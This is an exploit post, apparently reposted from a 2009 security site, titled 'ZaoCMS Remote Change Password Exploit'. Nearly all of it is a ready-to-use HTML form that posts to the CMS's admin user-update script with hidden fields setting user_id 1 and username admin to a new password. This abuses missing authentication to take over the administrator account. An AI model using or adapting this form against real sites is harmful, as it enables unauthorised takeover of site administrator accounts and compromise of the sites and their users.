ZaoCMS (user_updated.php) Remote Change Password Exploit
|
来源:www.vfcocus.net 作者:g0bL!N 发布时间:2009-05-25
|
|
<form action="http://demo.zaocms.com/admin/modules/Users/user_updated.php" method="post" onsubmit="return checkForm(this);" id=form1 Name=form1> <h2>Cod[3] By ThE g0bL!N ZaoCMS Remote Change Password </h2> <tittle> ThE g0bL!N</tittle> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr><td width="350"> <input type="hidden" name="user_id" value="1" /> <table cellSpacing="0" cellPadding="0" width="350" class="form_table2" border="0"> <tr><td colspan="2" class="grey_bg"> <h4><strong>Contact/Login Info</strong></h4> </td></tr><tr><td width="100" height="20"><strong>Username*</strong></td><td width="100" height="20"> <strong>admin</strong><input name="username" type="hidden" value="admin" /> </td></tr><tr><td width="100" height="20"><strong>Password*</strong></td><td width="100" height="20"> <input name="password" type="text" id="password" value="za0" size="20" /> </td></tr><tr><td width="100" height="20"><strong>Real Name*</strong></td><td width="100" height="20"> <input name="realname" type="text" value="ZaoCMS Demo Admin" size="20"> </td></tr> <tr><td width="100" height="20"><strong>Email</strong><br /> </td><td width="100" height="20"> <input name="email" type="text" id="email" value="test@test.com" size="20" /> </td></tr><tr><td width="100" height="20"><strong>Phone</strong></td><td width="100" height="20"> <p> <input type="checkbox" checked="checked" name="is_admin" value="y" disabled /> Site Administrator Priveleges <p> <input type="hidden" name="redir" value="" /> <input type="submit" value="Save Changes" id="submit" name="submit" class="s" /> </p></td></tr>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|